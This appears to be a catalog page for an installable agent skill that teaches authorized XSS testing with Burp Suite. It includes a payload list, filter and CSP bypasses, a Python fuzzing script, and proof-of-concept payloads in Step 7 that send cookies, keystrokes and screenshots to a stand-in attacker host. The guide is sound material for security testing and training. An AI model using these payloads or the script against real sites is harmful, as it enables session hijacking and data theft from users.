web application security

Testing for XSS Vulnerabilities with Burp Suite

Identifying and validating cross-site scripting vulnerabilities using Burp Suite's scanner, intruder, and repeater tools during authorized security assessments.

burpsuitecross-site-scriptingowasppenetration-testingweb-securityxss
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

When to Use

  • During authorized web application penetration testing to find reflected, stored, and DOM-based XSS
  • When validating XSS findings reported by automated vulnerability scanners
  • For testing the effectiveness of Content Security Policy (CSP) and XSS filters
  • When assessing client-side security of single-page applications (SPAs)
  • During bug bounty programs targeting XSS vulnerabilities

Prerequisites

  • Authorization: Written scope and rules of engagement for the target application
  • Burp Suite Professional: Licensed version with active scanner capabilities
  • Browser: Firefox or Chromium with Burp CA certificate installed
  • FoxyProxy: Browser extension configured to route traffic through Burp proxy (127.0.0.1:8080)
  • Target application: Authenticated access with valid test credentials
  • XSS payloads list: Custom wordlist or Burp's built-in XSS payload set

Workflow

Step 1: Configure Burp Suite and Map the Application

Set up the proxy and crawl the application to discover all input vectors.

# Burp Suite Configuration
1. Proxy > Options > Proxy Listeners: 127.0.0.1:8080
2. Target > Scope: Add target domain (e.g., *.target.example.com)
3. Dashboard > New Scan > Crawl only > Select target URL
4. Enable "Passive scanning" in Dashboard settings
 
# Browser Setup
- Install Burp CA: http://burpsuite → CA Certificate
- Import certificate into browser trust store
- Configure proxy: 127.0.0.1:8080
- Browse the application manually to build the site map

Step 2: Identify Reflection Points with Burp Repeater

Send requests to Repeater and inject unique canary strings to find where user input is reflected.

# In Burp Repeater, inject a unique canary string into each parameter:
GET /search?q=xsscanary12345 HTTP/1.1
Host: target.example.com
 
# Check the response for reflections of the canary:
# Search response body for "xsscanary12345"
# Note the context: HTML body, attribute, JavaScript, URL, etc.
 
# Test multiple injection contexts:
# HTML body: <p>Results for: xsscanary12345</p>
# Attribute: <input value="xsscanary12345">
# JavaScript: var search = "xsscanary12345";
# URL context: <a href="/page?q=xsscanary12345">
 
# Test with HTML special characters to check encoding:
GET /search?q=xss<>"'&/ HTTP/1.1
Host: target.example.com
# Check which characters are reflected unencoded

Step 3: Test Reflected XSS with Context-Specific Payloads

Based on the reflection context, craft targeted XSS payloads.

# HTML Body Context - Basic payload
GET /search?q=<script>alert(document.domain)</script> HTTP/1.1
Host: target.example.com
 
# HTML Attribute Context - Break out of attribute
GET /search?q=" onfocus=alert(document.domain) autofocus=" HTTP/1.1
Host: target.example.com
 
# JavaScript String Context - Break out of string
GET /search?q=';alert(document.domain)// HTTP/1.1
Host: target.example.com
 
# Event Handler Context - Use alternative events
GET /search?q=<img src=x onerror=alert(document.domain)> HTTP/1.1
Host: target.example.com
 
# SVG Context
GET /search?q=<svg onload=alert(document.domain)> HTTP/1.1
Host: target.example.com
 
# If angle brackets are filtered, try encoding:
GET /search?q=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: target.example.com

Step 4: Test Stored XSS via Burp Intruder

Use Burp Intruder to test stored XSS across input fields like comments, profiles, and messages.

# Burp Intruder Configuration:
# 1. Right-click request > Send to Intruder
# 2. Positions tab: Mark the injectable parameter
# 3. Payloads tab: Load XSS payload list
 
# Example payload list for Intruder:
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<math><mtext><table><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">
"><img src=x onerror=alert(1)>
'-alert(1)-'
\'-alert(1)//
 
# In Intruder > Options > Grep - Match:
# Add patterns: "alert(1)", "onerror=", "<script>"
# This flags responses where payloads are reflected/stored

Step 5: Test DOM-based XSS

Identify client-side JavaScript that processes user input unsafely using Burp's DOM Invader.

# Enable DOM Invader in Burp's embedded browser:
# 1. Open Burp's embedded Chromium browser
# 2. Click DOM Invader extension icon > Enable
# 3. Set canary value (e.g., "domxss")
 
# Common DOM XSS sinks to monitor:
# - document.write()
# - innerHTML
# - outerHTML
# - eval()
# - setTimeout() / setInterval() with string args
# - location.href / location.assign()
# - jQuery .html() / .append()
 
# Common DOM XSS sources:
# - location.hash
# - location.search
# - document.referrer
# - window.name
# - postMessage data
 
# Test URL fragment-based DOM XSS:
https://target.example.com/page#<img src=x onerror=alert(1)>
 
# Test via document.referrer:
# Create a page that links to the target with XSS in the referrer

Step 6: Bypass XSS Filters and CSP

When basic payloads are blocked, use advanced techniques to bypass protections.

# CSP Analysis - Check response headers:
Content-Security-Policy: default-src 'self'; script-src 'self' cdn.example.com
 
# Common CSP bypasses:
# If 'unsafe-inline' is allowed:
<script>alert(document.domain)</script>
 
# If a CDN is whitelisted (e.g., cdnjs.cloudflare.com):
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
 
# Filter bypass techniques:
# Case variation: <ScRiPt>alert(1)</ScRiPt>
# Null bytes: <scr%00ipt>alert(1)</script>
# Double encoding: %253Cscript%253Ealert(1)%253C/script%253E
# HTML entities: <img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
# Unicode escapes: <script>\u0061lert(1)</script>
 
# Use Burp Suite > BApp Store > Install "Hackvertor"
# Encode payloads with Hackvertor tags:
# <@hex_entities>alert(document.domain)<@/hex_entities>

Step 7: Validate Impact and Document Findings

Confirm exploitability and document the full attack chain.

# Proof of Concept payload that demonstrates real impact:
# Cookie theft:
<script>
fetch('https://attacker-server.example.com/steal?c='+document.cookie)
</script>
 
# Session hijacking via XSS:
<script>
new Image().src='https://attacker-server.example.com/log?cookie='+document.cookie;
</script>
 
# Keylogger payload (demonstrates impact severity):
<script>
document.onkeypress=function(e){
  fetch('https://attacker-server.example.com/keys?k='+e.key);
}
</script>
 
# Screenshot capture using html2canvas (stored XSS impact):
<script src="https://html2canvas.hertzen.com/dist/html2canvas.min.js"></script>
<script>
html2canvas(document.body).then(function(canvas){
  fetch('https://attacker-server.example.com/screen',{
    method:'POST',body:canvas.toDataURL()
  });
});
</script>
 
# Document each finding with:
# - URL and parameter
# - Payload used
# - Screenshot of alert/execution
# - Impact assessment
# - Reproduction steps

Key Concepts

Concept Description
Reflected XSS Payload is included in the server response immediately from the current HTTP request
Stored XSS Payload is persisted on the server (database, file) and served to other users
DOM-based XSS Payload is processed entirely client-side by JavaScript without server reflection
XSS Sink A JavaScript function or DOM property that executes or renders untrusted input
XSS Source A location where attacker-controlled data enters the client-side application
CSP Content Security Policy header that restricts which scripts can execute on a page
Context-aware encoding Applying the correct encoding (HTML, JS, URL, CSS) based on output context
Mutation XSS (mXSS) XSS that exploits browser HTML parser inconsistencies during DOM serialization

Tools & Systems

Tool Purpose
Burp Suite Professional Primary testing platform with scanner, intruder, repeater, and DOM Invader
DOM Invader Burp's built-in browser extension for DOM XSS testing
Hackvertor Burp BApp for advanced payload encoding and transformation
XSS Hunter Blind XSS detection platform that captures execution evidence
Dalfox CLI-based XSS scanner with parameter analysis (go install github.com/hahwul/dalfox/v2@latest)
CSP Evaluator Google tool for analyzing Content Security Policy effectiveness

Common Scenarios

Scenario 1: Search Function Reflected XSS

A search page reflects the query parameter in the results heading without encoding. Inject <script>alert(document.domain)</script> in the search parameter and demonstrate cookie theft via reflected XSS.

Scenario 2: Comment System Stored XSS

A blog comment form sanitizes <script> tags but allows <img> tags. Use <img src=x onerror=alert(document.domain)> to achieve stored XSS that fires for every visitor loading the page.

Scenario 3: SPA with DOM-based XSS

A React/Angular SPA reads window.location.hash and injects it into the DOM via innerHTML. Use DOM Invader to trace the source-to-sink flow and craft a payload in the URL fragment.

Scenario 4: XSS Behind WAF with Strict CSP

A WAF blocks common XSS patterns and CSP restricts inline scripts. Discover a JSONP endpoint on a whitelisted domain and use it as a script gadget to bypass CSP.

Output Format

## XSS Vulnerability Finding
 
**Vulnerability**: Stored Cross-Site Scripting (XSS)
**Severity**: High (CVSS 8.1)
**Location**: POST /api/comments → `body` parameter
**Type**: Stored XSS
**OWASP Category**: A03:2021 - Injection
 
### Reproduction Steps
1. Navigate to https://target.example.com/blog/post/123
2. Submit a comment with body: <img src=x onerror=alert(document.domain)>
3. Reload the page; the payload executes in the browser
 
### Impact
- Session hijacking via cookie theft for all users viewing the page
- Account takeover through session token exfiltration
- Defacement of the blog post page
- Phishing via injected login forms
 
### CSP Status
- No Content-Security-Policy header present
- X-XSS-Protection header not set
 
### Recommendation
1. Implement context-aware output encoding (HTML entity encoding for HTML context)
2. Deploy Content Security Policy with strict nonce-based script allowlisting
3. Use DOMPurify library for sanitizing user-generated HTML content
4. Set HttpOnly and Secure flags on session cookies
5. Add X-Content-Type-Options: nosniff header
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 1

api-reference.md2.0 KB

API Reference: Testing for XSS Vulnerabilities with Burp Suite

Burp Suite Professional Components

Scanner

  • Active scan: Automatically tests parameters for XSS
  • Passive scan: Identifies reflected inputs and missing security headers
  • Scan configuration: XSS-focused audit checks

Repeater

  • Send individual requests for manual payload testing
  • Compare request/response pairs across payload variations
  • Test character encoding behavior

Intruder

  • Positions: Mark injectable parameters
  • Payloads: Load XSS wordlists
  • Grep-Match: Flag responses containing alert(, onerror=, <script>
  • Attack types: Sniper (single param), Battering Ram (same payload all positions)

DOM Invader

  • Built-in browser extension for DOM XSS testing
  • Canary injection and sink monitoring
  • Source-to-sink data flow tracing

requests Library (Companion Script)

Reflection Detection

canary = "xsscanary12345"
resp = requests.get(f"{url}?q={canary}")
if canary in resp.text:
    # Determine context and fuzz with payloads

Character Encoding Test

resp = requests.get(f'{url}?q={quote("<>\"\'&/")}'
unencoded = [ch for ch in '<>"\'&/' if ch in resp.text]

Burp Extensions for XSS

Extension Purpose
Hackvertor Advanced payload encoding/transformation
XSS Validator Confirm XSS execution in headless browser
Reflector Highlight reflected parameters in proxy
Active Scan++ Enhanced active scanning rules

CSP Bypass Techniques

Weakness Bypass
unsafe-inline Direct <script> injection
unsafe-eval Use eval(), setTimeout()
Whitelisted CDN JSONP callback or Angular gadgets
Missing base-uri <base> tag hijack for relative scripts

References

Scripts 1

agent.py8.1 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""Agent for XSS testing workflows complementing Burp Suite during authorized assessments."""

import requests
import re
import json
import argparse
import urllib3
from datetime import datetime
from urllib.parse import urljoin, quote, urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

XSS_WORDLIST = [
    '<script>alert(document.domain)</script>',
    '<img src=x onerror=alert(document.domain)>',
    '<svg/onload=alert(document.domain)>',
    '<body onload=alert(document.domain)>',
    '<input onfocus=alert(document.domain) autofocus>',
    '<marquee onstart=alert(document.domain)>',
    '<details open ontoggle=alert(document.domain)>',
    '"><img src=x onerror=alert(document.domain)>',
    "'-alert(document.domain)-'",
    "\\'-alert(document.domain)//",
    '<ScRiPt>alert(document.domain)</sCrIpT>',
    '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>',
]


def find_reflection_points(base_url, token=None):
    """Crawl pages and find parameters that reflect user input."""
    print("[*] Finding reflection points...")
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    reflections = []
    try:
        resp = requests.get(base_url, headers=headers, timeout=15, verify=False)
        forms = re.findall(r'<form[^>]*action=["\']([^"\']*)["\'][^>]*>(.*?)</form>',
                           resp.text, re.DOTALL | re.IGNORECASE)
        for action, form_body in forms:
            inputs = re.findall(r'<input[^>]*name=["\']([^"\']*)["\']', form_body, re.IGNORECASE)
            for inp in inputs:
                reflections.append({"url": action or base_url, "param": inp, "method": "GET"})
        links = re.findall(r'href=["\']([^"\']*\?[^"\']*)["\']', resp.text)
        for link in links[:20]:
            parsed = urlparse(link)
            params = dict(p.split("=", 1) for p in parsed.query.split("&") if "=" in p)
            for param in params:
                reflections.append({"url": link.split("?")[0], "param": param, "method": "GET"})
    except requests.RequestException as e:
        print(f"  [-] Error crawling: {e}")
    print(f"  [+] Found {len(reflections)} potential injection points")
    return reflections


def test_character_encoding(url, param, token=None):
    """Test which special characters are reflected unencoded."""
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    test_string = '<>"\'&/`()'
    full_url = f"{url}?{param}={quote(test_string)}"
    try:
        resp = requests.get(full_url, headers=headers, timeout=10, verify=False)
        unencoded = [ch for ch in test_string if ch in resp.text]
        return unencoded
    except requests.RequestException:
        return []


def fuzz_xss_payloads(base_url, param_url, param_name, token=None, payloads=None):
    """Fuzz a parameter with XSS payloads and check for reflection."""
    if payloads is None:
        payloads = XSS_WORDLIST
    headers = {"Authorization": f"Bearer {token}"} if token else {}
    findings = []
    for payload in payloads:
        url = f"{urljoin(base_url, param_url)}?{param_name}={quote(payload)}"
        try:
            resp = requests.get(url, headers=headers, timeout=10, verify=False)
            if payload in resp.text:
                findings.append({
                    "type": "REFLECTED_XSS", "url": param_url, "param": param_name,
                    "payload": payload, "severity": "HIGH",
                })
                print(f"  [!] REFLECTED: {param_name}={payload[:40]}...")
                break
        except requests.RequestException:
            continue
    return findings


def test_stored_xss_endpoints(base_url, endpoints, token):
    """Test stored XSS via common input endpoints."""
    print("\n[*] Testing stored XSS endpoints...")
    findings = []
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    test_payloads = XSS_WORDLIST[:3]

    for ep in endpoints:
        url = urljoin(base_url, ep["submit"])
        for payload in test_payloads:
            try:
                data = {ep.get("field", "body"): payload}
                resp = requests.post(url, headers=headers, json=data, timeout=10, verify=False)
                if resp.status_code in (200, 201):
                    display_url = urljoin(base_url, ep["display"])
                    display_resp = requests.get(display_url, headers=headers, timeout=10, verify=False)
                    if payload in display_resp.text:
                        findings.append({
                            "type": "STORED_XSS", "submit": ep["submit"],
                            "display": ep["display"], "field": ep.get("field", "body"),
                            "payload": payload, "severity": "CRITICAL",
                        })
                        print(f"  [!] STORED XSS: {ep['submit']} -> {ep['display']}")
                        break
            except requests.RequestException:
                continue
    return findings


def analyze_csp(base_url):
    """Analyze CSP header for XSS bypass opportunities."""
    print("\n[*] Analyzing CSP for bypass opportunities...")
    findings = []
    try:
        resp = requests.get(base_url, timeout=10, verify=False)
        csp = resp.headers.get("Content-Security-Policy", "")
        if not csp:
            findings.append({"type": "NO_CSP", "detail": "No CSP header present", "severity": "MEDIUM"})
            print("  [!] No CSP header - inline scripts will execute")
            return findings

        directives = {}
        for part in csp.split(";"):
            part = part.strip()
            if " " in part:
                key, value = part.split(" ", 1)
                directives[key] = value

        script_src = directives.get("script-src", directives.get("default-src", ""))
        weaknesses = []
        if "'unsafe-inline'" in script_src:
            weaknesses.append("unsafe-inline allows inline scripts")
        if "'unsafe-eval'" in script_src:
            weaknesses.append("unsafe-eval allows eval()")
        if "data:" in script_src:
            weaknesses.append("data: URIs allowed in script-src")
        wildcard_domains = re.findall(r'\*\.\S+', script_src)
        if wildcard_domains:
            weaknesses.append(f"Wildcard domains: {wildcard_domains}")

        for w in weaknesses:
            findings.append({"type": "CSP_WEAKNESS", "detail": w, "severity": "HIGH"})
            print(f"  [!] CSP weakness: {w}")
        if not weaknesses:
            print(f"  [+] CSP appears well-configured")
    except requests.RequestException:
        pass
    return findings


def generate_report(findings, output_path):
    """Generate XSS assessment report."""
    report = {
        "assessment_date": datetime.now().isoformat(),
        "total_findings": len(findings),
        "by_severity": {},
        "findings": findings,
    }
    for f in findings:
        s = f.get("severity", "INFO")
        report["by_severity"][s] = report["by_severity"].get(s, 0) + 1
    with open(output_path, "w") as fh:
        json.dump(report, fh, indent=2)
    print(f"\n[*] Report: {output_path} | Findings: {len(findings)}")


def main():
    parser = argparse.ArgumentParser(description="XSS Testing Agent (Burp Suite Companion)")
    parser.add_argument("base_url", help="Base URL of the target")
    parser.add_argument("--token", help="Bearer token for authentication")
    parser.add_argument("--params", nargs="+", help="URL?param pairs to test")
    parser.add_argument("-o", "--output", default="xss_burp_report.json")
    args = parser.parse_args()

    print(f"[*] XSS Testing (Burp Suite Companion): {args.base_url}")
    findings = []
    findings.extend(analyze_csp(args.base_url))
    reflections = find_reflection_points(args.base_url, args.token)
    for ref in reflections[:15]:
        unencoded = test_character_encoding(
            urljoin(args.base_url, ref["url"]), ref["param"], args.token)
        if "<" in unencoded or '"' in unencoded:
            findings.extend(fuzz_xss_payloads(
                args.base_url, ref["url"], ref["param"], args.token))
    generate_report(findings, args.output)


if __name__ == "__main__":
    main()
Keep exploring